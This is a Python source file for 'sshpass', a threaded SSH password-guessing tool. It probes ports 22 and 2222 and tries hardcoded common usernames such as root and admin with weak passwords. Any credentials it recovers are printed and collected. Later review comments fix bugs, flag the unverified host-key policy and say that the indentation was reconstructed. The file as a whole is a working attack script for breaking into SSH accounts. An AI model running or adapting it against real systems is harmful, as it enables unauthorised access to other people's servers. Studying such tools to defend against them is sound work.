- ###################################################################################
- #
- # sshpass v1.01
- #
- # simple application for guessing ssh protocol passwords. focuses less on brute
- # forcing which is tedious and boring (and not that effective these days), and more
- # on trying common passwords. it was more a chance for me to do some threading in
- # python... If you give it a big wordlist be prepared to wait a while.
- #
- # caution! this is a really good way to get blocked by firewalls or fired from work
- #
- # changelog:
- # 05/05/2016 - now with threading and queues :D
- #
- ###################################################################################
- import paramiko, sys, os, socket
- from threading import Thread
- from Queue import Queue, Empty
class Password:
    '''Record of one host / port / username / password combination.

    Worker threads place instances of this class on the shared queue.
    str() of an instance contains the cleartext password, so any output or
    log that receives it is carrying a credential.
    '''

    def __init__(self, host, port, username, password):
        self.host, self.port = host, port
        self.username, self.password = username, password

    def __str__(self):
        # Every field, port included, must already be a string; join raises
        # TypeError otherwise, exactly as '+' concatenation would.
        fields = (self.host, self.port, self.username, self.password)
        return ':'.join(fields)
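def ssh_connect(host, port, username, password, code=0):
    '''Make one SSH password login attempt and return a status code.

    Returns ``code`` unchanged (0 by default) when the login is accepted,
    1 when the server rejects the credentials and 2 when the connection
    itself fails. Any other exception raised during the attempt propagates
    to the caller.

    Seen from the server, every call is a separate connection carrying a
    single password authentication attempt, which is the unit that
    failed-login alerting and per-source rate limiting count.
    '''
    ssh = paramiko.SSHClient()
    # AutoAddPolicy accepts whatever host key the server presents, so the
    # server's identity is never verified. Ordinary client code should load
    # known host keys and keep paramiko's default RejectPolicy instead.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(host, port=int(port), username=username, password=password)
    except paramiko.AuthenticationException:
        code = 1  # auth fail
    except socket.error:
        code = 2  # connection fail
    finally:
        # Close on every path: an exception not handled above previously
        # skipped close() and left the client object open.
        ssh.close()
    return code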
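def iterate(h, i, q):
    '''Check host ``h`` against a fixed list of common credentials.

    For each port in the built-in list, a plain TCP connect tests whether
    the port is open. On an open port every username/password pair from the
    built-in lists is passed to ssh_connect() until one returns 0. The first
    accepted pair is printed, put on ``q`` as a Password object, and ends the
    search for this host. ``i`` is only used to label the final status line.

    NOTE(review): the pasted listing lost its indentation; the loop nesting
    below follows the original docstring's stated intent that the loops stop
    once a password is found. Confirm against the author's copy.
    '''
    ports = ['22', '2222']
    usernames = ['root', 'admin', 'oracle', 'test', 'user', 'ssh']
    passwords = ['1234', '12345', '123456', 'Password', 'Password1',
                 'password', 'password1', 'password123', 'root', 'toor', 'ssh']
    for port in ports:
        # check if the port we want to try is open first...
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            result = sock.connect_ex((h, int(port)))
        finally:
            # The probe socket was never closed in the original, leaking one
            # descriptor per port checked.
            sock.close()
        if result != 0:  # port closed or unreachable
            continue

        # The original set a flag with `found == True`, a comparison whose
        # result was discarded, and never read the flag; an explicit result
        # variable replaces it.
        hit = None
        for u in usernames:
            for p in passwords:
                if ssh_connect(h, port, u, p) == 0:
                    hit = Password(h, port, u, p)
                    break
            if hit is not None:
                break

        if hit is not None:
            # The printed line includes the cleartext password.
            print('[*] ' + str(hit))
            q.put(hit)
            break
    print('[i] Host finished: ' + h + ' (stopping thread: ' + str(i) + ')')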
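# Script body: one worker thread per host, then a summary of what the
# workers put on the shared queue.
i = 0
q = Queue()
threads = []
hosts = ['127.0.0.1']

# Remember which host and index each thread was created for. The original
# status lines reused the loop variables `h` and `i` after the loop ended,
# so every line named the last host and the last index.
labels = []
for h in hosts:
    i += 1
    labels.append((h, i))
    threads.append(Thread(target=iterate, args=(h, i, q)))

for (host, index), thread in zip(labels, threads):
    print('[i] Testing host: ' + host + ' (thread: ' + str(index) + ')')
    thread.start()

for (host, index), thread in zip(labels, threads):
    print('[i] (waiting for thread ' + str(index) + ' to finish)')
    thread.join()

# All workers have been joined, so the queue contents are final. Copying the
# underlying deque never raises Empty, which made the original "no passwords"
# branch unreachable; test for an empty result explicitly instead.
recovered = list(q.queue)
if recovered:
    print('\n[*] Passwords recovered:')
    for elem in recovered:
        print('\t' + str(elem))
else:
    print('[*] No passwords recovered :(')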